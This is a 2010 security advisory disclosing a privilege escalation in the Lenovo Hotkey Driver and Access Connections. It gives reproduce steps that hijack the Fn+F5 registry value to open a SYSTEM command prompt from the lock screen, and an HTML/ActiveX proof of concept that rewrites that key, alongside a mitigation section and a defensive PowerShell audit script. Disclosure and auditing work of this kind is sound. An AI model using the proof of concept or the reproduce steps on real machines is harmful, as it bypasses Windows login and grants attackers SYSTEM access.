Lenovo Hotkey Driver / Access Connections <= v5.33 Privilege Escalation
Source: http://invalid-packet.blogspot.com/2010/03/full-di  Author: Chilik  Published: 2010-03-09
=======================================================================
Lenovo Hotkey Driver / Access Connections <= v5.33 Privilege Escalation
=======================================================================

Author: Chilik Tamir - Amdocs Power Security Testing Group
Website: http://invalid-packet.blogspot.com/2010/03/full-disclosure-security-vulnerability.html
Subject: Security vulnerability (privilege escalation) in Lenovo Hotkey Driver and Access Connections version <= v5.33
Impact:
A privilege escalation that can also serve as a backdoor: an attacker can bypass the Windows login and run arbitrary code as NT AUTHORITY\SYSTEM on Lenovo or ThinkPad laptops running Access Connections v5.33 and earlier (the issue has been tracked back to version 4).


Technical details:
The Hotkey Driver is a Lenovo application that monitors the Lenovo special hotkeys (Fn key combinations) and launches Lenovo-specified applications when they are pressed.
The default installation registers the Hotkey Driver as a service running as NT AUTHORITY\SYSTEM.
When a hotkey is detected, the driver reads the program to launch from the registry and invokes it. For example, when Fn+F5 is pressed the driver reads the value named File under HKEY_LOCAL_MACHINE\SOFTWARE\IBM\TPHOTKEY\CLASS\01\05 and launches the application it names (by default, Tp/AcFnF5.exe).
Because of how the service is installed, the hotkeys are available before Windows login and while the workstation is locked.
The value read from the registry is not validated at invocation time: whatever executable it names is run, with the service's privileges.
Nothing in the operating system monitors this key, so a modification goes undetected.
An attacker with only restricted access to the registry can therefore mount a targeted attack against Lenovo or ThinkPad users by pointing this value at an arbitrary application, which then runs with System privileges.
Reproduce:

On the target laptop, change the File value under HKEY_LOCAL_MACHINE\SOFTWARE\IBM\TPHOTKEY\CLASS\01\05 from 'Tp/AcFnF5.exe' to 'cmd.exe'.
Lock the workstation ('Windows' + 'L').
Press 'Fn' + 'F5': a Windows command prompt opens, running with System privileges, without any login.

Mitigation:
Update the Hotkey Driver and Access Connections to the latest version from the Lenovo website. Until that is done, verify that the File value under HKEY_LOCAL_MACHINE\SOFTWARE\IBM\TPHOTKEY\CLASS\01\05 still points at the default Tp/AcFnF5.exe and that only administrators can write to that key.
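The following audit script is an added example; it is not part of this advisory and not Lenovo's code. It reads the File and Parameters values under the key described above, flags a File value that differs from the documented default Tp/AcFnF5.exe, and reports any registry ACE that grants write rights to a low-privilege principal, which is the condition under which the hijack in the Reproduce section works from a restricted account. The WOW6432Node path (for a 32-bit component on 64-bit Windows) and the list of low-privilege principals are assumptions, not taken from the advisory.

```powershell
# Added example (not from the advisory): audit the Fn+F5 hotkey registry key.
# Run from an elevated PowerShell so that Get-Acl can read the key's security descriptor.

$DefaultFile = 'Tp/AcFnF5.exe'   # default launch target per the advisory
$Candidates  = @(
    'HKLM:\SOFTWARE\IBM\TPHOTKEY\CLASS\01\05',
    'HKLM:\SOFTWARE\WOW6432Node\IBM\TPHOTKEY\CLASS\01\05'   # assumption: 32-bit component on x64
)

# Principals an unprivileged local user can act as (assumption; extend for your environment).
$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    'Everyone'
)

# Rights that allow changing the 'File' value or replacing the key outright.
$WriteRights = [System.Security.AccessControl.RegistryRights]::SetValue -bor
               [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
               [System.Security.AccessControl.RegistryRights]::Delete -bor
               [System.Security.AccessControl.RegistryRights]::WriteKey -bor
               [System.Security.AccessControl.RegistryRights]::FullControl

function Test-HotkeyTarget {
    param([string]$KeyPath)

    if (-not (Test-Path -LiteralPath $KeyPath)) { return $null }

    $props  = Get-ItemProperty -LiteralPath $KeyPath
    $file   = $props.File
    $params = $props.Parameters

    # 1. Is the launch target still the documented default?
    $tampered = ($file -ne $DefaultFile)

    # 2. Does any Allow ACE give a low-privilege principal write rights on the key?
    $acl = Get-Acl -LiteralPath $KeyPath
    $weakAces = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($LowPrivPrincipals -contains $_.IdentityReference.Value) -and
        (($_.RegistryRights -band $WriteRights) -ne 0)
    }

    [pscustomobject]@{
        Key            = $KeyPath
        File           = $file
        Parameters     = $params
        Tampered       = $tampered
        WritableByUser = [bool]$weakAces
        WeakAces       = ($weakAces | ForEach-Object { "$($_.IdentityReference): $($_.RegistryRights)" }) -join '; '
    }
}

$results = $Candidates | ForEach-Object { Test-HotkeyTarget $_ } | Where-Object { $_ }
if (-not $results) {
    Write-Warning 'TPHOTKEY key not found; the Hotkey Driver may not be installed.'
    return
}

$results | Format-List | Out-Host

foreach ($r in $results) {
    if ($r.Tampered) {
        Write-Warning "$($r.Key): 'File' is '$($r.File)', not '$DefaultFile'. Possible hijack."
        # Restore the documented default once the finding is confirmed:
        # Set-ItemProperty -LiteralPath $r.Key -Name File -Value $DefaultFile
    }
    if ($r.WritableByUser) {
        Write-Warning "$($r.Key): writable by low-privilege principal(s): $($r.WeakAces)"
    }
}
```

A Tampered result means the hotkey already launches something other than the default; a WritableByUser result means the precondition for the attack exists even if the value is currently clean. Restoring the value does not remove the weakness, which is why the advisory's mitigation is the vendor update.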

Exploit example:
This HTML proof of concept uses the WScript.Shell ActiveX control to hijack the Access Connections hotkey by rewriting the registry values with reg.exe. It therefore runs only in Internet Explorer with ActiveX permitted, and the reg.exe calls succeed only if the browser's user can write to that key. Run it only in a virtualised environment.
-----------code starts here----------
<html>
<head>
<script language="javaScript" type="text/javascript">
// WScript.Shell is reachable from Internet Explorer only when ActiveX is permitted.
var myobject = new ActiveXObject("WScript.Shell");
var uri = "HKEY_LOCAL_MACHINE\\SOFTWARE\\IBM\\TPHOTKEY\\CLASS\\01\\05";

// Run a command with a hidden window (style 0) and wait for it to finish (true),
// so the backup completes before the original values are overwritten.
function runAndWait(command)
{
    myobject.Run(command, 0, true);
}

function install()
{
    // Save the original values of the hotkey key into a 'backup' subkey.
    runAndWait("reg.exe copy " + uri + " " + uri + "\\backup /f");
    // Point the Fn+F5 target at cmd.exe ...
    runAndWait("reg.exe ADD " + uri + " /v File /d cmd.exe /f");
    // ... and pass it a parameter (/T:74 only sets the console colours).
    runAndWait("reg.exe ADD " + uri + " /v Parameters /d /T:74 /f");
}

function remove()
{
    // Restore the saved values over the hijacked ones.
    runAndWait("reg.exe copy " + uri + "\\backup " + uri + " /f");
}
</script>
</head>
<body>
<h1>Lenovo Access Connections Exploit POC</h1>
<button onclick="install()">Install RootKit</button>
<p>
<button onclick="remove()">Remove RootKit</button>
</body>
</html>
---------code ends here------------

 